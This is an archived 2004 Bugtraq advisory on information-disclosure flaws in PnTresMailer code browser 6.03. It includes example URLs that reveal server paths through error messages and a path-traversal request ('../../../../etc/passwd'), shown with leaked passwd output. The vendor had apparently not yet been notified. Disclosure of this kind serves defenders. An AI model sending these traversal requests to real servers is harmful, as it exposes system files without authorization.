lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <200411261847.iAQIlua1001042@firebird.worldhq.net> Date: Fri, 26 Nov 2004 18:59:46 -0000 From: "John Cobb" <johnc@...ytes.com> To: <bugtraq@...urityfocus.com> Subject: PnTresMailer code browser 6.03 Vulnerabilities Hello All, PnTresMailer code browser 6.03 is open to information disclosure. Authors Site: http://canvas.anubix.net +-[Examples:]-----+ [1] www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&fileto highlight=w00t Warning: highlight_file(codebrowserPnTM/pnTresMailer/w00t): failed to open stream: No such file or directory in /var/www/html/codebrowserpntm.php on line 130 Warning: highlight_file(): Failed opening 'codebrowserPnTM/pnTresMailer/w00t' for highlighting in /var/www/html/codebrowserpntm.php on line 130 [2] www.victimsite.com/codebrowserpntm.php?downloadfolder=pnTresMailer&filetodow nload=../../../../etc/passwd Look what ive got... root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync +-[Notes:]-------+ Author is yet to be informed, will do so tonight. Regards John C JohnC@...ytes.com
Powered by blists - more mailing lists